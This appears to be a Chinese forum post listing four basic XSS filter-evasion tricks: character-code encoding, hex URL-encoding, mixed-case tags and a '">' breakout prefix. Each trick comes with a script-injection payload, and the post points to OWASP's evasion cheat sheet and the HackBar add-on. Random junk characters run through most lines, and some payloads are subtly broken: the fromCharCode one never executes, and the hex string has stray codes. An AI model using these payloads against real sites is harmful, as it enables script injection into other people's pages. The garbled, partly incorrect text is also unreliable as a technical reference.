四种超级基础的绕过方法。
5 Q+ r4 T- v- X, S0 u) x! g1.转换为ASCII码
' s. R$ l9 C' Y! d, M1 v例子:原脚本为<script>alert(‘I love F4ck’)</script >
9 o% O5 v* {. ~0 h& S1 }; ?/ P0 r通过转换,变成:& h2 ~/ L) U+ z8 \" [
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
0 m C8 K; g) y- r & z& F8 h. v+ N& c
2.转换为HEX(十六进制)
0 W7 J+ P, h2 g1 k, O例子:原脚本为<script>alert(‘I love F4ck’)</script>
# m. Z. h$ ?# i' v! u通过转换,变成:# }/ [# R* A7 ?! D) v& @
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e6 ?2 ?. t3 P) N7 O7 B
; ~, z. g# {" }3.转换脚本的大小写3 G' V3 q5 {+ k9 w
例子:原脚本为<script>alert(‘I love F4ck’)</script>9 A+ f# m3 v7 D, F: e
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
7 X; \# K" @. X6 K! H! x
2 v7 k+ f3 C! @) D$ [1 q9 u1 B4.增加闭合标记”>1 Z0 K' g, f. F' Q( P
例子:原脚本为<script>alert(‘I love F4ck’)</script>, h7 k3 Z4 j1 \, L j( N+ V
转换为:”><script>alert(‘I love F4ck’)</script>
) [. k6 b6 c1 S$ x/ {( \" i更详细绕过技术请参考此网页
0 e& L9 z$ C3 z; Y) t3 R0 I$ mhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
- [% u! U9 V l. n$ V g( ~6 w3 l( I; e' f' ^$ |* ^" Q3 a, J
转换工具使用的是火狐的 hackbar mozilla addon. |